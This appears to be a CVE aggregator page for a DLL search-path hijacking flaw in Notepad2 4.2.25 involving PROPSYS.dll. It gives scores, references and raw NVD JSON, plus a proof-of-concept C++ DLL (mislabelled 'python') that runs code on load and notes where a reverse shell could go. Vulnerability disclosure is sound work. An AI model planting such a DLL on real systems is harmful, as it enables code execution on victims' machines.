CVE-2026-4545

Description

A security flaw has been discovered in Flos Freeware Notepad2 4.2.25. This affects an unknown function in the library PROPSYS.dll. Performing a manipulation results in uncontrolled search path. The attack is only possible with local access. The attack is considered to have high complexity. The exploitability is reported as difficult. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.0

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:flos-freeware:notepad2:4.2.25:*:*:*:*:*:*:* - VULNERABLE

Flos Freeware Notepad2 4.2.25

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/**
 * PoC for CVE-2026-4545 - Uncontrolled Search Path in Notepad2
 * This code demonstrates how to create a malicious PROPSYS.dll
 * to be loaded by Notepad2 when placed in the same directory.
 * 
 * Compilation (Visual Studio Developer Command Prompt):
 * cl /LD malicious_propsys.cpp user32.lib
 */
#include <windows.h>

// Entry point for the DLL
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // This code runs when the DLL is loaded into the process
        MessageBoxA(NULL, "CVE-2026-4545 PoC: Malicious PROPSYS.dll loaded successfully!", "Exploit", MB_OK | MB_ICONINFORMATION);
        
        // Example: Start a calculator or reverse shell
        // WinExec("calc.exe", SW_SHOW);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Export dummy functions to match expected DLL structure if necessary
extern "C" __declspec(dllexport) void DummyFunction() {}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4545
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4545
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4545/
[4] VulDB https://vuldb.com/cve/CVE-2026-4545
[5] https://drive.google.com/file/d/1o3A3x47B2gi645H02-28qgoIgGN-g6rK/view
[6] https://vuldb.com/?ctiid.352372
[7] https://vuldb.com/?id.352372
[8] https://vuldb.com/?submit.774752

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4545", "sourceIdentifier": "[email protected]", "published": "2026-03-22T12:16:03.963", "lastModified": "2026-04-30T14:25:09.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Flos Freeware Notepad2 4.2.25. This affects an unknown function in the library PROPSYS.dll. Performing a manipulation results in uncontrolled search path. The attack is only possible with local access. The attack is considered to have high complexity. The exploitability is reported as difficult. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha descubierto una falla de seguridad en Flos Freeware Notepad2 4.2.25. Afecta a una función desconocida en la biblioteca PROPSYS.dll. Realizar una manipulación resulta en una ruta de búsqueda incontrolada. El ataque solo es posible con acceso local. El ataque se considera de alta complejidad. La explotabilidad se reporta como difícil. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:C/I:C/A:C", "baseScore": 6.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 1.5, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-426"}, {"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flos-freeware:notepad2:4.2.25:*:*:*:*:*:*:*", "matchCriteriaId": "7F9353EF-AE2A-46D0-A3D9-0368BD060444"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1o3A3x47B2gi645H02-28qgoIgGN-g6rK/view", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://vuldb.com/?ctiid.352372", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://vuldb.com/?id.352372", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.774752", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}